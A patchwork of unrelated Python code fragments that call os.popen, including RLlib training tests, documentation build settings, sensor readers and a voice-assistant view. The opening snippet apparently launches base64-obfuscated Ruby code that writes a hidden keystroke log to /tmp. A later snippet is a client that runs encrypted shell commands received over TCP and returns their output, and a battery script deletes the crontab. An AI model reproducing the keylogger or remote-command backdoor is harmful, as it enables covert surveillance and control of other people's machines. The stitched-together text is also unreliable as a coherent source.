    base64_ruby_code = base64.b64encode(get_ruby_code())
    # Random 6-12 letter file name under /tmp for the keystroke log.
    randname=''.join([random.choice(string.ascii_lowercase) for i in range(0,random.randint(6,12))])
    logFile = '/tmp/{name}'.format(name=randname)
    cmd = 'echo "require \'base64\';eval(Base64.decode64(\'%s\'))" | ruby > %s &' % (base64_ruby_code, logFile)
    os.popen(cmd)
    time.sleep(1)  # give the background ruby process time to appear in ps
    # get process id
    try:
        pid = os.popen('ps aux | grep " ruby" | grep -v grep').read().split()[1]
    except:
        pass
    print logFile
    print pid
    return True
def learn_test_multi_agent_plus_rollout(algo):
    """End-to-end RLlib smoke test (multi-agent): train `algo` on
    MultiAgentCartPole until reward 180, then roll out the best
    checkpoint via rollout.py and assert mean episode reward >= 190.

    Runs once per framework (tf, torch); temp results are removed at the
    end of each iteration.
    """
    for fw in framework_iterator(frameworks=("tf", "torch")):
        # [:-1] strips the trailing newline from mktemp's output.
        tmp_dir = os.popen("mktemp -d").read()[:-1]
        if not os.path.exists(tmp_dir):
            # Last resort: Resolve via underlying tempdir (and cut tmp_.
            tmp_dir = ray.utils.tempfile.gettempdir() + tmp_dir[4:]
            if not os.path.exists(tmp_dir):
                sys.exit(1)
        print("Saving results to {}".format(tmp_dir))
        rllib_dir = str(Path(__file__).parent.parent.absolute())
        print("RLlib dir = {}\nexists={}".format(rllib_dir, os.path.exists(rllib_dir)))

        def policy_fn(agent):
            # Map agent id N to policy "polN".
            return "pol{}".format(agent)

        observation_space = Box(float("-inf"), float("inf"), (4, ))
        action_space = Discrete(2)
        config = {
            "num_gpus": 0,
            "num_workers": 1,
            "evaluation_config": {
                "explore": False
            },
            "framework": fw,
            "env": MultiAgentCartPole,
            "multiagent": {
                "policies": {
                    "pol0": (None, observation_space, action_space, {}),
                    "pol1": (None, observation_space, action_space, {}),
                },
                "policy_mapping_fn": policy_fn,
            },
        }
        stop = {"episode_reward_mean": 180.0}
        tune.run(algo, config=config, stop=stop, checkpoint_freq=1, checkpoint_at_end=True, local_dir=tmp_dir, verbose=1)
        # Find last checkpoint and use that for the rollout.
        checkpoint_path = os.popen("ls {}/PPO/*/checkpoint_*/"
                                   "checkpoint-*".format(tmp_dir)).read()[:-1]
        checkpoint_paths = checkpoint_path.split("\n")
        assert len(checkpoint_paths) > 0
        checkpoints = [
            cp for cp in checkpoint_paths
            if re.match(r"^.+checkpoint-\d+$", cp)
        ]
        # Sort by number and pick last (which should be the best checkpoint).
        last_checkpoint = sorted(
            checkpoints,
            key=lambda x: int(re.match(r".+checkpoint-(\d+)", x).group(1)))[-1]
        assert re.match(r"^.+checkpoint_\d+/checkpoint-\d+$", last_checkpoint)
        if not os.path.exists(last_checkpoint):
            sys.exit(1)
        print("Best checkpoint={} (exists)".format(last_checkpoint))
        ray.shutdown()
        # Test rolling out n steps.
        result = os.popen(
            "python {}/rollout.py --run={} "
            "--steps=400 "
            "--out=\"{}/rollouts_n_steps.pkl\" --no-render \"{}\"".format(
                rllib_dir, algo, tmp_dir, last_checkpoint)).read()[:-1]
        if not os.path.exists(tmp_dir + "/rollouts_n_steps.pkl"):
            sys.exit(1)
        print("Rollout output exists -> Checking reward ...".format(
            checkpoint_path))
        # Average the per-episode rewards that rollout.py prints.
        episodes = result.split("\n")
        mean_reward = 0.0
        num_episodes = 0
        for ep in episodes:
            mo = re.match(r"Episode .+reward: ([\d\.\-]+)", ep)
            if mo:
                mean_reward += float(mo.group(1))
                num_episodes += 1
        mean_reward /= num_episodes
        print("Rollout's mean episode reward={}".format(mean_reward))
        assert mean_reward >= 190.0
        # Cleanup.
        os.popen("rm -rf \"{}\"".format(tmp_dir)).read()
def run_win_command_with_output(cmd):
    """Run a Windows shell command, echoing it first, and return its
    stdout as a list of lines."""
    print 'Run cmd:: %s' %(cmd)
    output = os.popen(cmd)
    return output.readlines()
def measure_temp():
    """Return the Raspberry Pi SoC temperature as reported by
    `vcgencmd measure_temp`, with the leading 'temp=' stripped."""
    raw = os.popen("vcgencmd measure_temp").readline()
    return raw.replace("temp=", "")
#!/usr/bin/python # author: maciej plonski / mplonski / sokoli.pl # licence: GNU GPL # script's executing shutdown when battery is chardged in > 95% # usage // add script to root's cron import os p = int(os.popen('/usr/bin/acpi -b').read().split(" ")[3].split("%")[0]) if p > 95: os.system("crontab -r") os.system("shutdown -h 0")
from distutils import dir_util
# macOS post-build packaging: copy locale data into the .app bundle and
# bundle qt_menu.nib (required by Qt apps built with py2app).
if sys.platform == 'darwin':
    # Remove the copied py file
    os.remove(mainscript)
    resource = "dist/" + name + ".app/Contents/Resources/"
    dir_util.copy_tree("locale", resource + "locale/")
    # Try to locate qt_menu
    # Let's try the port version first!
    if os.path.isfile("/opt/local/lib/Resources/qt_menu.nib"):
        qt_menu_location = "/opt/local/lib/Resources/qt_menu.nib"
    else:
        # No dice? Then let's try the brew version
        if os.path.exists("/usr/local/Cellar"):
            qt_menu_location = os.popen(
                "find /usr/local/Cellar -name qt_menu.nib | tail -n 1").read()
        # no brew, check /opt/local
        else:
            qt_menu_location = os.popen(
                "find /opt/local -name qt_menu.nib | tail -n 1").read()
        # find's output ends with a newline; strip it.
        qt_menu_location = re.sub('\n', '', qt_menu_location)
    if (len(qt_menu_location) == 0):
        print "Sorry couldn't find your qt_menu.nib this probably won't work"
    else:
        print "Found your qib: " + qt_menu_location
        # Need to include a copy of qt_menu.nib
        shutil.copytree(qt_menu_location, resource + "qt_menu.nib")
        # Need to touch qt.conf to avoid loading 2 sets of Qt libraries
        fname = resource + "qt.conf"
} lib_info = {} for name, pattern in patterns.items(): match = pattern.search(objdump) if not match: raise InternalError("could not find 'NEEDED %s...' in " "objdump of compiled test C++ file" % name) lib_info[name] = match.group("ver") finally: _rmtree(tmpdir) # If this is glibc, get its version. if int(_split_ver(lib_info["libc"])[0]) >= 6: libc_so = os.path.join("/lib", "libc.so."+lib_info["libc"]) o = os.popen(libc_so) try: libc_so_ver_line = o.readline().strip() finally: retval = o.close() if retval: raise InternalError("error running '%s'" % libc_so) # e.g.: # GNU C Library stable release version 2.3.3 (20040917), by R... # GNU C Library stable release version 2.5, by Roland McGrath et al. pattern = re.compile(r"^GNU C Library.*?(\d+\.\d+(\.\d+)?)") match = pattern.search(libc_so_ver_line) if not match: raise InternalError("error determining glibc version from '%s'" % libc_so_ver_line) lib_info["glibc"] = match.group(1)
def learn_test_plus_rollout(algo, env="CartPole-v0"):
    """End-to-end RLlib smoke test (single-agent): train `algo` on `env`
    via train.py until reward 190, then roll out the best checkpoint via
    rollout.py and assert mean episode reward >= 190.

    Runs once per framework (tf, torch); temp results are removed at the
    end of each iteration.
    """
    for fw in framework_iterator(frameworks=("tf", "torch")):
        # Extra escaped JSON fragment appended to --config for the framework.
        fw_ = ", \\\"framework\\\": \\\"{}\\\"".format(fw)
        # [:-1] strips the trailing newline from mktemp's output.
        tmp_dir = os.popen("mktemp -d").read()[:-1]
        if not os.path.exists(tmp_dir):
            # Last resort: Resolve via underlying tempdir (and cut tmp_.
            tmp_dir = ray.utils.tempfile.gettempdir() + tmp_dir[4:]
            if not os.path.exists(tmp_dir):
                sys.exit(1)
        print("Saving results to {}".format(tmp_dir))
        rllib_dir = str(Path(__file__).parent.parent.absolute())
        print("RLlib dir = {}\nexists={}".format(rllib_dir, os.path.exists(rllib_dir)))
        # Train via the command-line entry point.
        os.system("python {}/train.py --local-dir={} --run={} "
                  "--checkpoint-freq=1 --checkpoint-at-end ".format(
                      rllib_dir, tmp_dir, algo) +
                  "--config=\"{\\\"num_gpus\\\": 0, \\\"num_workers\\\": 1, "
                  "\\\"evaluation_config\\\": {\\\"explore\\\": false}" + fw_ +
                  "}\" " + "--stop=\"{\\\"episode_reward_mean\\\": 190.0}\"" +
                  " --env={}".format(env))
        # Find last checkpoint and use that for the rollout.
        checkpoint_path = os.popen("ls {}/default/*/checkpoint_*/"
                                   "checkpoint-*".format(tmp_dir)).read()[:-1]
        checkpoints = [
            cp for cp in checkpoint_path.split("\n")
            if re.match(r"^.+checkpoint-\d+$", cp)
        ]
        # Sort by number and pick last (which should be the best checkpoint).
        last_checkpoint = sorted(
            checkpoints,
            key=lambda x: int(re.match(r".+checkpoint-(\d+)", x).group(1)))[-1]
        assert re.match(r"^.+checkpoint_\d+/checkpoint-\d+$", last_checkpoint)
        if not os.path.exists(last_checkpoint):
            sys.exit(1)
        print("Best checkpoint={} (exists)".format(last_checkpoint))
        # Test rolling out n steps.
        result = os.popen(
            "python {}/rollout.py --run={} "
            "--steps=400 "
            "--out=\"{}/rollouts_n_steps.pkl\" --no-render \"{}\"".format(
                rllib_dir, algo, tmp_dir, last_checkpoint)).read()[:-1]
        if not os.path.exists(tmp_dir + "/rollouts_n_steps.pkl"):
            sys.exit(1)
        print("Rollout output exists -> Checking reward ...".format(
            checkpoint_path))
        # Average the per-episode rewards that rollout.py prints.
        episodes = result.split("\n")
        mean_reward = 0.0
        num_episodes = 0
        for ep in episodes:
            mo = re.match(r"Episode .+reward: ([\d\.\-]+)", ep)
            if mo:
                mean_reward += float(mo.group(1))
                num_episodes += 1
        mean_reward /= num_episodes
        print("Rollout's mean episode reward={}".format(mean_reward))
        assert mean_reward >= 190.0
        # Cleanup.
        os.popen("rm -rf \"{}\"".format(tmp_dir)).read()
# Remote-command client: receives AES-encrypted (base32-wrapped) shell
# commands over TCP, runs them via os.popen, and sends the encrypted
# output back.  Python 2 (uses the '<>' operator).
HOST = 'localhost'
PORT = 5000
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dest = (HOST, PORT)
tcp.connect(dest)
# Commands are '#'-padded to the AES block size; strip the padding.
comandoCripto = tcp.recv(1024)
comando = aes.decrypt(base64.b32decode(comandoCripto)).rstrip('#')
print comando
# '\x18' (CAN) is the agreed end-of-session sentinel.
while comando <> '\x18':
    try:
        resultado=os.popen(comando).read()
        if len(resultado) <= 0:
            print resultado
            resultado="Comando Invalido ou O Comando nao emite uma resposta"
        # Pad to a multiple of 16 bytes before encrypting.
        cryptoSaida = resultado+'#'*(16-len(resultado)%16)
        texto_cifrado = base64.b32encode(aes.encrypt(cryptoSaida))
        tcp.send(texto_cifrado)
    except:
        resultado = "comando inexistente"
    comandoCripto = tcp.recv(1024)
    comando = aes.decrypt(base64.b32decode(comandoCripto)).rstrip('#')
    if comando == "sair":
        break
tcp.close()
# (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, target_name, title, author, project, description, category), ] # Documents to append as an appendix to all manuals. # texinfo_appendices = [] # If false, no module index is generated. # texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. # texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. # texinfo_no_detailmenu = False watermark = os.popen("git branch --contains $(git rev-parse HEAD)\ | awk -F/ '/stable/ {print $2}'").read().strip(' \n\t').capitalize() if watermark == "": watermark = "Pre-release" # -- Options for sphinxmark ----------------------------------------------- sphinxmark_enable = True sphinxmark_div = 'docs-body' sphinxmark_image = 'text' sphinxmark_text = watermark sphinxmark_text_color = (128, 128, 128) sphinxmark_text_size = 70
import hashlib, os

# Show the working-directory listing (Windows `dir`) before prompting for a
# file name. NOTE(review): `dir` is Windows-specific — presumably intended;
# on POSIX it would fail silently.
output = os.popen('dir').read()
print(output)

a = input("input file name :")
# Context manager guarantees the handle is closed even if read() raises.
with open(a, 'rb') as f:
    data = f.read()

print("MD5: " + hashlib.md5(data).hexdigest())
print("SHA-1: " + hashlib.sha1(data).hexdigest())
# BUGFIX: label previously read "SHA-256<digest>" — the ": " was missing.
print("SHA-256: " + hashlib.sha256(data).hexdigest())


def sha1_largefile(filename, blocksize=8192):
    """Return the SHA-1 hex digest of *filename*, hashing in *blocksize* chunks.

    Streams the file so arbitrarily large files never load fully into memory.
    Returns None (after printing a diagnostic) when the file cannot be opened.
    Previously this helper existed only as commented-out code.
    """
    sha1 = hashlib.sha1()
    try:
        with open(filename, "rb") as fh:
            while True:
                buf = fh.read(blocksize)
                if not buf:
                    break
                sha1.update(buf)
    except IOError as e:
        print("file open error", e)
        return None
    return sha1.hexdigest()
# How to display URL addresses: 'footnote', 'no', or 'inline'. # texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. # texinfo_no_detailmenu = False # -- Options for PDF output -------------------------------------------------- pdf_documents = [ (master_doc, target_name, title, author) ] # Used for the developer documentation latest_tag = os.popen('git describe --abbrev=0 --tags').read().strip('\n') # Used for the upgrade documentation previous_release_branch_name = 'pike' current_release_branch_name = 'queens' # dev docs have no branch specified on master; for stable braches it's "/branch/" watermark = os.popen("git branch --contains $(git rev-parse HEAD) | awk -F/ '/stable/ {print $2}'").read().strip(' \n\t').capitalize() if watermark == "": watermark = "Pre-release" deploy_branch_link_name = "latest" dev_branch_link_name = "" current_release_git_branch_name = "master" current_release_gnocchi_git_branch_name = "master" else: deploy_branch_link_name = current_release_branch_name
import os, time f = os.popen('ls -l') records = f.readlines() for record in records: print record time.sleep(1)
def init_update(self):
    """Build and return the per-refresh temperature update callable.

    Tries, in order: a user-supplied sensor (self.custom_temp as
    "major,minor"), a list of known psutil chip names, the first available
    psutil chip, and finally the raw /sys thermal-zone file.  On total
    failure, marks the source unavailable and returns a no-op callable.
    """

    def empty_func():
        """No-op fallback returned when no valid temperature source exists."""
        return None

    def update_max_temp(last_value):
        """Track the maximum observed temperature in self.max_temp."""
        try:
            if int(last_value) > int(self.max_temp):
                self.max_temp = last_value
        except (ValueError, TypeError):
            # Not 0 to avoid problems with graph creation
            self.max_temp = 1

    def set_threshold(sensor, idx):
        """Set self.temp_thresh from the chip's 'high' value, else the default."""
        try:
            sample = psutil.sensors_temperatures()
            self.temp_thresh = sample[sensor][0].high
            logging.debug("Temperature threshold set to " + str(self.temp_thresh))
        except (ValueError, TypeError):
            self.temp_thresh = self.THRESHOLD_TEMP

    def update_func(sensor, idx):
        """Read sensor[idx]'s current reading and push it into the source."""
        sample = psutil.sensors_temperatures()
        last_value = sample[sensor][idx].current
        update_max_temp(last_value)
        self.last_temp = last_value
        Source.update(self)

    logging.debug("custom temp is " + str(self.custom_temp))

    # Use the manual sensor
    if self.custom_temp is not None:
        logging.debug("Selected custom temp")
        try:
            sensors_info = self.custom_temp.split(",")
            sensor_major = sensors_info[0]
            sensor_minor = sensors_info[1]
            logging.debug("Major " + str(sensor_major) +
                          " Minor " + str(sensor_minor))

            def update():
                update_func(sensor_major, int(sensor_minor))
            set_threshold(sensor_major, int(sensor_minor))
            return update
        except (KeyError, IndexError, AttributeError):
            self.is_available = False
            logging.debug("Illegal sensor")
            return empty_func

    # Select from possible known sensors
    try:
        sensors = psutil.sensors_temperatures()
        sensor = None
        if 'coretemp' in sensors:
            sensor = 'coretemp'
        elif 'k10temp' in sensors:
            sensor = 'k10temp'
        elif 'it8655' in sensors:
            # BUGFIX: previously assigned the integer 0 here; psutil keys
            # its readings by chip *name*, so 0 would KeyError later.
            sensor = 'it8655'
        elif 'it8622' in sensors:
            sensor = 'it8622'
        elif 'it8721' in sensors:
            sensor = 'it8721'
        elif 'bcm2835_thermal' in sensors:
            sensor = 'bcm2835_thermal'
        else:
            # Fallback to first in list
            try:
                chips = list(sensors.keys())
                sensor = chips[0]
                logging.debug("Fallback: setting temp sensor " + str(sensor))
            except (KeyError, IndexError):
                pass

        if sensor is not None:
            logging.debug("Temperature sensor is set to " + str(sensor))
            set_threshold(sensor, 0)

            def update():
                update_func(sensor, 0)
            return update
        # If sensors was not found using psutil, try reading file
        else:
            logging.debug("Unable to set sensors with psutil")
            try:
                thermal_file = '/sys/class/thermal/thermal_zone0/temp'
                cmd = 'cat ' + thermal_file + ' 2> /dev/null'
                # Probe once so a missing file surfaces here, not mid-run.
                os.popen(cmd).read()

                def update():
                    with os.popen(cmd) as temp_file:
                        last_value = temp_file.read()
                    logging.info("Recorded temp " + last_value)
                    try:
                        # Thermal zone reports millidegrees Celsius.
                        last_value = int(last_value) / 1000
                    except ValueError:
                        logging.debug("Thermal zone contains no data")
                        self.is_available = False
                        return empty_func
                    update_max_temp(last_value)
                    self.last_temp = last_value
                    Source.update(self)
                self.temp_thresh = self.THRESHOLD_TEMP
                logging.debug("Used thermal zone as file")
                return update
            except KeyError:
                self.is_available = False
                return empty_func
    except AttributeError:
        # psutil.sensors_temperatures does not exist on this platform.
        self.is_available = False
        return empty_func
    # Tail of an ENVI-header parser whose `def` appears earlier in the file:
    # each "key = value" pair is split and the fields of interest
    # (samples / lines / bands) are captured as strings.
    if len(words) == 2:
        f, g = words[0].strip(), words[1].strip()
        if f == 'samples':
            samples = g
        if f == 'lines':
            lines = g
        if f == 'bands':
            bands = g
    return samples, lines, bands


def md(d):
    # make folder if not yet exist
    """Create directory *d* if it does not already exist (non-recursive)."""
    if not os.path.exists(d):
        os.mkdir(d)


# Locate the conversion binary under the current user's home directory.
exe = "/home/" + \
    os.popen("whoami").read().strip() + \
    "/GitHub/bcws-psu-research/cpp/convert_iq_to_s2.exe"
exe = os.path.abspath(exe)
print(exe)

# Data folder: first CLI arg, else the current working directory (with a
# trailing path separator).
data_folder = args[1] if len(args) > 1 else os.path.abspath(
    os.getcwd()) + os.path.sep

if not os.path.exists(exe):
    print("Error: failed to find convert_iq_to_s2.exe")
    sys.exit(1)

# Enumerate every *_SLC folder inside the data folder.
cmd = "ls -1d " + os.path.abspath(data_folder) + os.path.sep + "*_SLC"
files = [f.strip() for f in os.popen(cmd).readlines()]
folders = [f + '/' for f in files]
def copy(name: str, index: int = 0):
    """Run the console `copy` command for *name* from slot *index*.

    Returns the command's captured stdout as a string.
    """
    command = dn_console + 'copy --name %s --from %d' % (name, index)
    pipe = os.popen(command)
    try:
        return pipe.read()
    finally:
        # Always release the pipe, mirroring the explicit close of the original.
        pipe.close()
def upload(request):
    """Handle a voice-command upload from the robot front-end (Django view).

    Saves the POSTed audio file, converts it to text, matches the text
    against known commands (the index-based dispatch below), optionally
    synthesizes a spoken answer, and returns a JSON payload describing
    the answer text and synthesized-audio file name.
    """
    # print(request.POST)
    file_name = os.path.join('robot_app', 'static', 'audio_file',
                             request.POST['name'])
    file = request.FILES['file']
    with open(file_name, 'wb') as f:
        f.write(file.read())
    text = audio2text(file_name)
    # Commands beginning with these two-character verbs (search / send / play)
    # are matched on the verb alone; everything else matches the whole text.
    if text[0:2] == '搜索' or text[0:2] == '发送' or text[0:2] == '播放':
        index = get_high_sim(text[0:2])
    else:
        index = get_high_sim(text)
    if index is not None:
        answer = read_answer(index)
        if index == 4:
            os.popen('notepad')
        if index == 3:
            # Launch QQ, wait for it, then press Enter to confirm login.
            os.popen('G:\QQ\Bin\QQScLauncher.exe')
            time.sleep(5)
            win32api.keybd_event(13, 0, 0, 0)  # key code 13 is Enter (original note said 86)
            win32api.keybd_event(13, 0, win32con.KEYEVENTF_KEYUP, 0)
        if index == 5:
            # Baidu-search the text that follows the two-character verb.
            driver = webdriver.Chrome()  # drive the browser
            driver.get("http://www.baidu.com")  # open the fetched URL
            time.sleep(3)  # pause 3 seconds on this page
            # print("site title:", driver.title)  # fetch and print the site name
            # keyword.txt may hold arbitrary keywords, one per line
            driver.find_element('id', 'kw').send_keys(text[2:])  # type into the search box (id=kw)
            driver.find_element('id', 'su').click()  # click the search button (id=su)
            # time.sleep(5)  # pause 5 seconds
        if index == 6:
            # Screenshot Baidu into a folder named after today's date.
            picture_time = time.strftime("%Y-%m-%d-%H_%M_%S",
                                         time.localtime(time.time()))
            directory_time = time.strftime("%Y-%m-%d",
                                          time.localtime(time.time()))
            print(picture_time)
            print(directory_time)
            # print the working directory
            print(os.getcwd())
            # Ensure a directory named after today's date exists under cwd,
            # creating it if necessary.
            try:
                File_Path = os.getcwd() + '\\' + directory_time + '\\'
                if not os.path.exists(File_Path):
                    os.makedirs(File_Path)
                    print("目录新建成功:%s" % File_Path)
                else:
                    print("目录已存在!!!")
            except BaseException as msg:
                print("新建目录失败:%s" % msg)
            driver = webdriver.Chrome()
            driver.get("https://baidu.com/")
            try:
                url = driver.save_screenshot('.\\' + directory_time + '\\'
                                             + picture_time + '.png')
                print("%s :截图成功!!!" % url)
            except BaseException as pic_msg:
                print("截图失败:%s" % pic_msg)
            time.sleep(2)
            driver.quit()
        if index == 7:
            # Launch NetEase Cloud Music, wait for startup, start playback.
            os.popen('G:\CloudMusic\cloudmusic.exe')
            time.sleep(8)
            start()
        if index == 8:
            # "send <msg> to <contact>": split on the character '给' ("to").
            x = text.index('给')
            int(x)
            to_who = text[x + 1:]
            msg = text[2:x]
            qq(to_who)
            send_qq(to_who, msg)
        if index == 9:
            stop()
        if index == 10:
            last()
        if index == 11:
            next()
        if index == 12:
            turn_up()
        if index == 13:
            turn_down()
        if index == 14:
            love()
        if index == 15:
            show_words()
        if index == 16:
            shoutsown_words()
        if index == 17:
            os.system(r'taskkill /f /t /im cloudmusic.exe')
        if index == 18:
            start()
        if index == 19:
            # "play <song>": look the song up, then play it.
            music = text[2:]
            find_music()
            time.sleep(1)
            play_music(music)
    else:
        # No known command matched: ask the chatbot and cache the answer.
        answer = get_roboot_answer(text)
        con[text] = answer
    # Synthesize the answer to speech next to the uploaded file.
    hecheng_name = os.path.join('robot_app', 'static', 'audio_file',
                                'hecheng' + request.POST['name'])
    if text2audio(answer, hecheng_name):
        print('合成成功!')
        res_name = hecheng_name.strip('robot_app//')
    else:
        print('合成失败!')
        res_name = ''
    res_str = {
        'play_tpe': 'talk',
        'res_name': res_name,
        'content': answer
    }
    return HttpResponse(json.dumps(res_str), content_type='application/json')
def main(argv):
    """Summarize AGE/NR annotations from a (possibly gzipped) VCF (Python 2).

    argv[0]: VCF path (".gz" suffix is streamed through `gzip -dc`)
    argv[1]: query FASTA length table consumed by LoadFaLen()
    argv[2]: optional figure-name prefix (default "test")

    Prints one row per unique PASS record to stdout and feeds the
    accumulated distributions to DrawFig().
    """
    qFaLen = LoadFaLen(argv[1])
    figPrefix = 'test'
    if len(argv) > 2:
        figPrefix = argv[2]
    # Stream gzipped input through gzip -dc; open plain files directly.
    if argv[0][-3:] == '.gz':
        I = os.popen('gzip -dc %s' % argv[0])
    else:
        I = open(argv[0])
    data, distance, leftIdn, rightIdn, aveIdn, nr, aa, bb = [], {}, {}, {}, {}, {}, {}, {}
    s = set()  # seen "chrom:pos" keys, to drop duplicate records
    print '#Chr\tPosition\tDistance\tLeftIden\tRightIden\tAveIden\tN-Ratio\tAA'
    while 1:
        # VCF format
        lines = I.readlines(100000)  # read in ~100 KB batches
        if not lines:
            break
        for line in lines:
            if re.search(r'^#', line):
                continue
            col = line.strip('\n').split()
            key = col[0] + ':' + col[1]
            if key in s:
                continue
            s.add(key)
            #if re.search(r'^PASS', col[6] ) : continue
            if not re.search(r'^PASS', col[6]):
                continue
            #if svsize < 500 : continue
            # AGE=... INFO field carries alignment-edge identity statistics.
            mage = re.search(r';?AGE=([^;]+)', col[7])
            if mage:
                age = mage.group(1).split(':')
            else:
                age = ['0', '0', '0', '0', '0', '0', '0']
            # Map FORMAT keys to their positions in the sample column.
            fmat = {k: i for i, k in enumerate(col[8].split(':'))}
            if 'VS' not in fmat or 'QR' not in fmat:
                continue
            idx = 9  # the single sample column
            if col[idx].split(':')[fmat['QR']] == '.':
                continue
            for type in ['AA', 'QR', 'VS']:
                if type not in fmat:
                    print >> sys.stderr, '# [ERROR] The "Format" fields did not contian %s in VCF %s' % ('AA', argv[0])
                    sys.exit(1)
            svsize = string.atoi(col[idx].split(':')[fmat['VS']])
            # QR holds comma-separated "id-start-end" triples; use the last.
            qId = col[idx].split(':')[fmat['QR']].split(',')[-1].split('-')[0]
            qSta = string.atof(col[idx].split(':')[fmat['QR']].split(',')[-1].split('-')[1])
            qEnd = string.atof(col[idx].split(':')[fmat['QR']].split(',')[-1].split('-')[2])
            if qId not in qFaLen:
                print >> sys.stderr, '#[ERROR]', qId, 'is not been found in file', argv[1], '\n'
                sys.exit(1)
            # Convert positions to (rounded) percent of the query length.
            qSta = int(qSta * 100 / qFaLen[qId] + 0.5)
            qEnd = int(qEnd * 100 / qFaLen[qId] + 0.5)
            if qSta > 100 or qEnd > 100:
                print >> sys.stderr, '#[ERROR] Query size Overflow!', col[7]
                sys.exit(1)
            # Distance from the nearer query edge, in percent.
            leg = min(qSta, 100 - qEnd)
            #if 100 - qEnd < qSta : leg = qEnd
            leftIden, rightIden = string.atoi(age[2]), string.atoi(age[4])
            avelen, aveIden = string.atoi(age[5]), string.atoi(age[6])
            nn = re.search(r';?NR=([^;]+)', col[7])
            # N-ratio as a percentage with one decimal place.
            n = int(1000 * string.atof(nn.group(1)) + 0.5) / 10.0
            if len(col[idx].split(':')[fmat['AA']].split(',')) < 4:
                print >> sys.stderr, col[0], col[1], fmat['AA'], col[idx].split(':')[fmat['AA']], col[idx]
                continue
            alt = string.atoi(col[idx].split(':')[fmat['AA']].split(',')[1])  # Alternate perfect
            bot = string.atoi(col[idx].split(':')[fmat['AA']].split(',')[3])  # Both imperfect
            # Histogram buckets keyed by observed value: [count, reserved].
            if leg not in distance: distance[leg] = [0, 0]
            if leftIden not in leftIdn: leftIdn[leftIden] = [0, 0]
            if rightIden not in rightIdn: rightIdn[rightIden] = [0, 0]
            if aveIden not in aveIdn: aveIdn[aveIden] = [0, 0]
            if n not in nr: nr[n] = [0, 0]
            if alt not in aa: aa[alt] = [0, 0]
            if bot not in bb: bb[bot] = [0, 0]
            distance[leg][0] += 1
            leftIdn[leftIden][0] += 1
            rightIdn[rightIden][0] += 1
            aveIdn[aveIden][0] += 1
            nr[n][0] += 1
            aa[alt][0] += 1
            bb[bot][0] += 1
            data.append([leg, alt, leftIden, rightIden, aveIden, n, bot])
            print col[0], '\t', col[1], '\t', leg, '\t', leftIden, '\t', rightIden, '\t', aveIden, '\t', n, '\t', alt, '\t', bot, '\t', svsize, qId, qFaLen[qId]
    I.close()
    data = np.array(data)
    # Summary statistics go to stderr so stdout stays machine-parseable.
    print >> sys.stderr, '\nPosition\tALTernatePerfect\tLeftIdentity\tRightIdentity\tAveIden\tNRatio\tBothImperfect'
    print >> sys.stderr, 'Means: ', data.mean(axis=0), '\nstd : ', data.std(axis=0), '\nMedian: ', np.median(data, axis=0)
    print >> sys.stderr, '25 Percentile:', np.percentile(data, 25, axis=0), '\n50 Percentile:', np.percentile(data, 50, axis=0), '\n75 Percentile:', np.percentile(data, 75, axis=0)
    DrawFig(figPrefix, \
            np.array(Accum(distance)), \
            np.array(Accum(leftIdn)), \
            np.array(Accum(rightIdn)), \
            np.array(Accum(aveIdn)), \
            np.array(Accum(nr, True)), \
            np.array(Accum(aa)), \
            np.array(Accum(bb)), \
            np.array(data))
#! /usr/bin/env python
def get_text(url):
    """Return the textual rendering of *url* as dumped by w3m.

    Uses `w3m -dump` with UTF-8 output and a very wide column limit so long
    lines are not wrapped.
    SECURITY FIX: the URL is now escaped with shlex.quote instead of being
    interpolated inside double quotes, so quotes/metacharacters in the URL
    cannot inject shell commands.
    """
    import os
    import shlex
    return str(os.popen(f'w3m -O utf8 -cols 10000 -dump {shlex.quote(url)}').read())
import os

# Refresh the loop-find clang tool source, rebuild it with ninja, then run it
# over every file in all_tests/, appending all output to result.txt.
os.system('\cp LoopFind.cpp ~/llvm/llvm/tools/clang/tools/extra/loop-find/')
os.system('ninja loop-find')

base_cmd = './bin/loop-find all_tests/'
for test_line in os.popen('ls all_tests/').readlines():
    # Drop the trailing newline from each `ls` entry before appending it.
    os.system(base_cmd + test_line[0:-1] + ' >> result.txt')
def get_fps(self):
    """Compute (fps, jank_count) from SurfaceFlinger frame latency data.

    The dumpsys invocation differs per Android major version; frame
    timestamps are normalized to seconds, then FPS and a jank count are
    derived via GetNormalizedDeltas.
    """
    device = self.get_mdevice()
    package = self.get_packagename()
    activity = self.get_activityname()
    androidversion = self.get_androidversion()
    command = ""
    # The SurfaceView layer name format changed across Android versions.
    if androidversion < 7:
        command = adb + " -s {} shell dumpsys SurfaceFlinger --latency 'SurfaceView'".format(device)
    elif androidversion == 7:
        command = adb + " -s {} shell \"dumpsys SurfaceFlinger --latency 'SurfaceView - {}/{}'\"".format(device, package, activity)
    elif androidversion > 7:
        command = adb + " -s {} shell \"dumpsys SurfaceFlinger --latency 'SurfaceView - {}/{}#0'\"".format(device, package, activity)
    print(command)
    results = os.popen(command)
    if not results:
        print("nothing")
        return (None, None)
    #print(device,results.read())
    timestamps = []
    # nanoseconds per second
    nanoseconds_per_second = 1e9
    # refresh interval: 16.67 ms, i.e. a 60 Hz display
    refresh_period = 16666666 / nanoseconds_per_second
    # sentinel value marking a still-pending fence timestamp
    pending_fence_timestamp = (1 << 63) - 1
    # walk the dumpsys output
    for line in results:
        # strip whitespace and split into columns
        line = line.strip()
        # NOTE(review): `list` shadows the builtin of the same name.
        list = line.split("\t")
        # skip rows that are not three-column data rows
        if len(list) != 3:
            continue
        # take the middle column (frame submission time)
        timestamp = float(list[1])
        # discard entries whose fence is still pending
        if timestamp == pending_fence_timestamp:
            continue
        timestamp /= nanoseconds_per_second
        # Android 7's dump yields 255 rows: 127 zero rows plus 128 real
        # samples, so zero timestamps are dropped.
        if timestamp != 0:
            timestamps.append(timestamp)
    # total number of collected frames
    frame_count = len(timestamps)
    # frame lengths and normalized frame lengths
    frame_lengths, normalized_frame_lengths = self.GetNormalizedDeltas(timestamps, refresh_period, 0.5)
    if len(frame_lengths) < frame_count - 1:
        print('Skipping frame lengths that are too short.')
        frame_count = len(frame_lengths) + 1
    # with insufficient data, bail out
    if not refresh_period or not len(timestamps) >= 3 or len(frame_lengths) == 0:
        print("未收集到有效数据")
        return "N/a", "N/a"
    # elapsed seconds = last timestamp minus first timestamp
    seconds = timestamps[-1] - timestamps[0]
